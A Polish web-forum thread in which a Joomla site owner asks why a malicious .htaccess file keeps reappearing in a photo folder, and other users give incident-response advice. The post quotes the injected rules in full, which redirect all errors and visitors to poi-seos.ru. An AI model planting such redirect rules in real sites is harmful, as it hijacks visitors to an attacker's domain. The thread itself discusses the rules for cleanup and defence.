wklejanie pliku htaccess, włamanie

[cyryllo]

Witam
Od kilku dni borykam się z problemem, że ktoś wkleja mi cały czas plik .htaccess z taką treścią:

Kod:

#  HostRule
RewriteEngine On 
ErrorDocument 400 http://poi-seos.ru/index.php 
ErrorDocument 401 http://poi-seos.ru/index.php 
ErrorDocument 403 http://poi-seos.ru/index.php 
ErrorDocument 404 http://poi-seos.ru/index.php 
ErrorDocument 500 http://poi-seos.ru/index.php 
RewriteEngine on 
RewriteCond %{HTTP_HOST} !^poi-seos\.ru 
RewriteRule ^(.*)$ http://poi-seos.ru/index.php [R=permanent,L]
#  /HostRule

do katalogu ze zdjęciami i po kliknięciu na zdjęcie (czasem nie widać wogóle zdjęć) przerzuca na tą stronę.
Sprawdzałem logi i nic nie ma aby ktoś o tej godzinie co plik powstał ktoś coś robił:/
Wysłałem zgłoszenie do ovh.pl o sprawdzenie w ich statystykach ale znając ich to poczekam do poniedziałku.

Uprawnienia do pliku mam dobre, więc nie wiem o co chodzi, robiłem aktualizacje komponentów.

Dziwne jest też to że nawet zmieniając uprawnienia do pliku .htaccess na brak zapisu i tak gość może zapisywać :/

Ma ktoś jakiś pomysły?

[moje]

Polecam np. wiki.joomla.p + włamanie, wiki.joomla.p + zabezpieczenie ;)

[cyryllo]

Czytane. Mam zabezpieczone wstrzykiwanie kodu itp.
Chcę się obejść bez reinstalacji całej strony. Ale jak będę zmuszony no to trudno :/

[zwiastun]

Po prostu wykonaj całą procedurę odtwarzania witryny po włamaniu. Jeśli nie miałeś, a pewno nie miałeś, narzędzi umożliwiających wychwycenie zmian dokonanych w plikach (np. QuardXT), to "cząstkowa" naprawa odbywa się raczej na oślep i nieskutecznie

[cyryllo]

No właśnie tu popełniłem ten błąd :/
A takie małe pytanie czy mógł mi coś zmodyfikować w bazie danych?
Najlepsze jest to że ten plik tworzy tylko w jednym katalogu ze zdjęciami który sam stworzyłem

[abbadona]

Polecam Eyesite.
Mnie osobiście bardzo pomógł w zmonitorowaniu których plików "dotykał" hakjer. Jak zestawiłem logi z serwera z informacjami z Eyesite to miałem dość dokładny obraz jego poczynań na serwerze. Oczywiście to nie jest środek na przeciwdziałanie włamaniu, ale pomaga już po.

[malkowitch]

A zmieniałeś chociażby dane dostępowe FTP?
To najczęstszy sposób dostania się do strony różnych świństw.
Zalecał także bym przeskanowanie przy rozruchu kompa antywirusem.

[cyryllo]

Zmieniłem wszystkie hasła. Kompa skanowałem. Ale od teraz to łącze się już tylko z Linuksa.
Mnie tylko dziwi fakt że ma dostęp tylko do jednego katalogu.

Sprawdziłem daty modyfikacji plików i żadne z głównych pików nie była modyfikowana ostatnio, przeglądnełem pliki szablonu ale też czysto.

Edit:

A tak z ciekawości jakie kraje blokujecie na swoich stronach?

[abbadona]

Wychodzi na to, że musisz zrobić to co radzi zwiastun.
Jeżeli masz dostęp do jednego katalogu to znaczy to:
- że tylko ten katalog możesz otworzyć?
- że tylko tam możesz coś zapisać?
- a możesz skasować inne katalogi?
Jeżeli masz podmieniany htaccess, to możliwe jest, że masz zablokowany dostęp do tych katalogów właśnie takimi plikami.
I tu wracamy do tego, że ratuje cię tylko pełna czystka i odtworzenie - jak pisze zwiastun.

ps. jak ktoś pisze, że "przejrzał" pliki joomli to słabo mi się robi, jak to zrobiłeś? ile czasu ci to zajęło?, ile przeoczyłeś?, czego szukałeś? dat modyfikacji? daty utworzenia? jak rozróżniłeś jedną od drugiej? a może sprawdzałeś czas modyfikacji lub utworzenia?
no i ostatnie pytanie jak masz dostęp tylko do jednego katalogu to ja mogłeś przejrzeć pliki joomla? które to twoim zdaniem są "pliki główne"?

jeszcze mógłbym tak długo pytać ale podpaść adminom nie chcę ;)

dwa tygodnie temu miałem włamanie, od tego czasu miałem ponad 250 kolejnych prób. Wiem jak to jest nie fajnie - chętnie w miarę swoich skromnych doświadczeń ci pomogę, ale prośbę mam:
a. czytaj co ktoś ci poleca zrobić
b. rób to zgodnie z instrukcją
c. pisz posty jak najściślej i dokładnie

[cyryllo]

Napisałem że ten ktoś co wrzuca pliki ma prawdopodobnie dostęp do tylko tego jednego katalogu i w nim dodaje ten plik. Ja mam pełny dostęp do plików.
A jeśli chodzi o przeglądanie plików to przeglądnąłem tylko szablon + kilka innych które wydawały mi się podejrzane głównie patrząc na datę modyfikacji.